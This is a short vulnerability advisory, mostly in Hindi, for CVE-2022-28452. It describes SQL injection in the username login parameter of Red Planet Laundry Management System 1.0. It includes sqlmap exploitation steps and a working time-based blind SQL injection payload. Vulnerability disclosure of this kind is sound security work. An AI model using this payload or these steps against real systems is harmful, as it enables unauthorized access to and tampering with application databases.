
CVE-2022-28452
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-28452 https://nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-28452 https://laundry.redplanetcomputers.com/
1-विवरण:
Red Planet Laundry Management System 1.0 पैरामीटर 'username' के माध्यम से /index.php/login/rediract में SQL इंजेक्शन के प्रति संवेदनशील है। इस समस्या का शोषण करके हमलावर एप्लिकेशन से समझौता कर सकता है, डेटा तक पहुंच या संशोधन कर सकता है, या अंतर्निहित डेटाबेस में छिपी भेद्यताओं का शोषण कर सकता है।
2-प्रमाण की अवधारणा:
Burpsuite में प्रभावित पृष्ठ से 'username' पैरामीटर के साथ अनुरोध को इंटरसेप्ट करें और इसे poc.txt के रूप में सहेजें। फिर डेटाबेस से डेटा निकालने के लिए SQLmap चलाएं: sqlmap.py -r poc.txt --dbms=mysql
3-उदाहरण पेलोड:
URL एन्कोडेड POST इनपुट username को सेट किया गया: 0'XOR(if(now()=sysdate(),sleep(4),0))XOR'Z
संपर्क विवरण: [email protected]